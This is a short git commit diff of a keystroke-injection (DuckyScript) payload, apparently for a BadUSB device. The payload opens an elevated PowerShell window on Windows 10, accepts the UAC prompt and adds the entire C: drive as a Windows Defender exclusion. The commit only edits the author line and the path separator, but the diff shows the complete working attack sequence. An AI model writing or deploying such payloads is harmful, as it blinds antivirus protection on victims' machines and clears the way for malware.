Update Add Exclusion C-drive.txt

This commit is contained in:
beigeworm
2023-05-10 12:59:05 +00:00
committed by GitHub
parent a0a8b5f56b
commit 23de20496c

View File

@@ -1,5 +1,5 @@
REM Title: Add Exclusion C-drive
REM Author: @beigeworm
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses Powershell to add an exclusion to Windows Defender to ingore any files within C:/
REM Target: Windows 10
@@ -16,7 +16,7 @@ ALT y
DELAY 5000
REM add the exclusion path.
STRING Add-MpPreference -ExclusionPath C:/
STRING Add-MpPreference -ExclusionPath C:\
ENTER
DELAY 250
STRING exit